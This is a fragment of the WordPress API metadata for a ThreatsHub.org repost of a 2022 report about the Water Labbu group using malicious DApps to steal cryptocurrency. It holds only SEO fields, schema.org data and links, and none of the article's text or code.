Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform\",\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"alternateName\":\"Threatshub.org\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\",\"name\":\"ThreatsHub.org\",\"alternateName\":\"Threatshub.org\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"contentUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"width\":432,\"height\":435,\"caption\":\"ThreatsHub.org\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/x.com\\\/threatshub\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\",\"name\":\"TH Author\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"caption\":\"TH Author\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Water Labbu Abuses Malicious DApps to Steal Cryptocurrency 2026 | ThreatsHub Cybersecurity News","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.threatshub.org\/blog\/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency\/","og_locale":"en_US","og_type":"article","og_title":"Water Labbu Abuses Malicious DApps to Steal Cryptocurrency 2026 | ThreatsHub Cybersecurity News","og_description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","og_url":"https:\/\/www.threatshub.org\/blog\/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency\/","og_site_name":"ThreatsHub Cybersecurity News","article_published_time":"2022-10-03T00:00:00+00:00","og_image":[{"url":"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/thumbnails\/22\/water-labbu-cover.png","type":"","width":"","height":""}],"author":"TH Author","twitter_card":"summary_large_image","twitter_creator":"@threatshub","twitter_site":"@threatshub","twitter_misc":{"Written by":"TH Author","Est. reading time":"8 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.threatshub.org\/blog\/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency\/#article","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency\/"},"author":{"name":"TH Author","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476"},"headline":"Water Labbu Abuses Malicious DApps to Steal Cryptocurrency","datePublished":"2022-10-03T00:00:00+00:00","mainEntityOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency\/"},"wordCount":1700,"publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency\/#primaryimage"},"thumbnailUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2022\/10\/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency.jpg","keywords":["Trend Micro Research : APT&amp;Targeted Attacks","Trend Micro Research : Articles, News, Reports","Trend Micro Research : Cyber Crime","Trend Micro Research : Cyber Threats","Trend Micro Research : Research","Trend Micro Research : Web"],"articleSection":["TrendMicro"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.threatshub.org\/blog\/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency\/","url":"https:\/\/www.threatshub.org\/blog\/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency\/","name":"Water Labbu Abuses Malicious DApps to Steal Cryptocurrency 2026 | ThreatsHub Cybersecurity News","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency\/#primaryimage"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency\/#primaryimage"},"thumbnailUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2022\/10\/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency.jpg","datePublished":"2022-10-03T00:00:00+00:00","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","breadcrumb":{"@id":"https:\/\/www.threatshub.org\/blog\/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.threatshub.org\/blog\/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency\/#primaryimage","url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2022\/10\/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency.jpg","contentUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2022\/10\/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency.jpg","width":1619,"height":1345},{"@type":"BreadcrumbList","@id":"https:\/\/www.threatshub.org\/blog\/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.threatshub.org\/blog\/"},{"@type":"ListItem","position":2,"name":"Trend Micro Research : APT&amp;Targeted Attacks","item":"https:\/\/www.threatshub.org\/blog\/tag\/trend-micro-research-apttargeted-attacks\/"},{"@type":"ListItem","position":3,"name":"Water Labbu Abuses Malicious DApps to Steal Cryptocurrency"}]},{"@type":"WebSite","@id":"https:\/\/www.threatshub.org\/blog\/#website","url":"https:\/\/www.threatshub.org\/blog\/","name":"ThreatsHub Cybersecurity News","description":"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform","publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"alternateName":"Threatshub.org","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.threatshub.org\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.threatshub.org\/blog\/#organization","name":"ThreatsHub.org","alternateName":"Threatshub.org","url":"https:\/\/www.threatshub.org\/blog\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","contentUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","width":432,"height":435,"caption":"ThreatsHub.org"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/x.com\/threatshub"]},{"@type":"Person","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476","name":"TH Author","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","caption":"TH Author"}}]}},"_links":{"self":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/48736","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/comments?post=48736"}],"version-history":[{"count":0,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/48736\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media\/48737"}],"wp:attachment":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media?parent=48736"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/categories?post=48736"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/tags?post=48736"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}